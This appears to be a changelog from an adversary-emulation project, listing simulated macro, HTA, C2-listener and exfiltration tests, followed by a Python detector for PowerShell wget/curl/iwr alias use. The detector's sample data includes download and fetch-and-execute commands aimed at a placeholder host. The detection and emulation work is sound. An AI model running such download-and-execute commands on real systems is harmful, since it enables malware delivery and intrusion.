Adding the following:
- New DragonsTail Chain reaction that does not execute Mimikatz.
- Generic .HTA file with supporting markdown file highlighting details.
- Generic `Atomic.doc` with supporting markdown file highlighting embedded macro.
- Guide (markdown) explaining how to zip files to simulate email borne threats.
- Simple guide on how to set up a "Listener" for C2 communication in Python and PowerShell.
- Generate-Macro.ps1 - Builder script that will generate 8 different macro embedded XLS files to simulate macro techniques actively being used.
* Discovery and Cleanup
* Generate docs from job=validate_atomics_generate_docs branch=Discovery
* mv discovery.bat
* Fixed Discovery.bat URLs
Updated Techniques with new location of discovery.bat
* Generate docs from job=validate_atomics_generate_docs branch=Discovery
Adding POSIX Chain Reaction that is platform aware and runs different checks for each platform. Simulates Discovery, Collection, and Exfiltration phases.
Argonaut was built with the idea of assisting organizations with identifying the use of Invoke-WebRequest aliases - Wget and Curl. Within your detection tools, how does it look? Do you have detection for Wget and curl on Windows?
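The detection question the Argonaut message raises can be checked against PowerShell script-block telemetry. The following is an added example, not Argonaut's or Atomic Red Team's own code: it scans constructed sample script-block text for `wget`, `curl` and `iwr` used in command position and resolves them to `Invoke-WebRequest` (in Windows PowerShell 5.1 all three are built-in aliases of that cmdlet; PowerShell 7 dropped `wget` and `curl`). The `SAMPLE_EVENTS` entries and the `find_web_request_aliases` function are assumptions for the example.

```python
import re

# Constructed sample script-block log entries (host, script text); not real telemetry.
SAMPLE_EVENTS = [
    ("ws01", "wget http://example.invalid/payload.txt -OutFile C:\\Temp\\p.txt"),
    ("ws01", "Get-ChildItem C:\\Users"),
    ("ws02", "curl -Uri http://example.invalid/a -UseBasicParsing"),
    ("ws03", "iwr 'http://example.invalid/b' | iex"),
    ("ws04", "Invoke-WebRequest -Uri http://example.invalid/c"),
    ("ws05", "$curl = 1  # a variable named curl, not the alias"),
]

# Windows PowerShell 5.1 ships wget, curl and iwr as aliases of Invoke-WebRequest;
# the logged text shows the alias, so a rule that only looks for the cmdlet name misses it.
ALIASES = {"wget": "Invoke-WebRequest", "curl": "Invoke-WebRequest", "iwr": "Invoke-WebRequest"}

# Match the token only in command position: start of text, or right after a pipe,
# semicolon, open paren/brace, ampersand or newline, and followed by whitespace or end.
_CMD_RE = re.compile(
    r"(?:^|[|;({&\n])\s*(wget|curl|iwr|Invoke-WebRequest)(?=\s|$)",
    re.IGNORECASE,
)


def find_web_request_aliases(events):
    """Return (host, token_as_typed, resolved_cmdlet, script_block) for every hit.

    Direct Invoke-WebRequest calls are returned too (token == resolved) so one
    pass covers both spellings; alias-only hits are those where they differ.
    """
    hits = []
    for host, block in events:
        for m in _CMD_RE.finditer(block):
            token = m.group(1)
            resolved = ALIASES.get(token.lower(), token)
            hits.append((host, token, resolved, block))
    return hits


if __name__ == "__main__":
    for host, token, resolved, block in find_web_request_aliases(SAMPLE_EVENTS):
        print(f"{host}: {token} -> {resolved}: {block}")
```

The `$curl = 1` entry is deliberately left unmatched to show why the command-position check matters; a bare substring search would flag it.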